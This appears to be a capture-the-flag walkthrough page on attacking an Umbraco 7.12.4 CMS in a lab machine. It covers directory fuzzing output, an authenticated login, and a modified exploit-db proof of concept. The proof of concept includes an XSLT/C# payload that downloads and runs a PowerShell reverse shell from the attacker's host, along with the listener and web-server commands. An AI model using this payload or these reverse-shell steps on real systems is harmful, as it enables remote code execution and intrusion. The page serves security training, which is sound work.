Umbraco - 80

Browsing through, this is the only page that's interesting. There was also a /intranet page that's empty so I ran directory fuzzing.

ffuf -u http://10.10.10.180/intranet/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

blog                    [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 143ms]
contact                 [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 229ms]
home                    [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 161ms]
products                [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 162ms]
product                 [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 162ms]
people                  [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 218ms]
Home                    [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 381ms]
Products                [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 138ms]
Contact                 [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 128ms]
Blog                    [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 140ms]
People                  [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 334ms]
Product                 [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 492ms]
master                  [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 418ms]
person                  [Status: 200, Size: 2745, Words: 505, Lines: 82, Duration: 3069ms]
HOME                    [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 338ms]
contentpage             [Status: 200, Size: 3313, Words: 683, Lines: 117, Duration: 340ms]
CONTACT                 [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 308ms]
Master                  [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 338ms]
MASTER                  [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 1095ms]
                        [Status: 200, Size: 3313, Words: 683, Lines: 117, Duration: 249ms]
PRODUCT                 [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 538ms]
PRODUCTS                [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 375ms]
ContentPage             [Status: 200, Size: 3313, Words: 683, Lines: 117, Duration: 696ms]
Person                  [Status: 200, Size: 2745, Words: 505, Lines: 82, Duration: 161ms]
PEOPLE                  [Status: 500, Size: 3420, Words: 774, Lines: 81, Duration: 162ms]
:: Progress: [220560/220560] :: Job [1/1] :: 100 req/sec :: Duration: [0:35:49] :: Errors: 0 ::

Visiting them seems like they are still under development. I get runtime errors:

Using the credentials found earlier I was able to log in:

Before I look for exploits, I need to footprint the CMS for version numbers. Clicking on help:

We know its version 7.12.4

There is an authenticated code execution vulnerability on this exact CMS version in exploit-db.

This deep dive explains the vulnerability in details which I think is important to understand instead of blindly just exploiting the vulnerability.

There are some modifications that needs to be done to the PoC.

First lets create a shell.ps1 file. I copied the Shells/Invoke-PowerShellTcp.ps1 file and added this line at the bottom

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.7 -Port 1337

Started a listener:

nc -lnvp 1337

And the modified part of the PoC:

payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c powershell -c iex(new-object net.webclient).downloadstring(\'http://10.10.16.7:8000/shell.ps1\')"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

This will make a GET request for shell.ps1:

python3 -m http.server 8000

And it will execute it and we get a shell.

PreviousNFS - 2049 NextFoothold

Last updated 10 months ago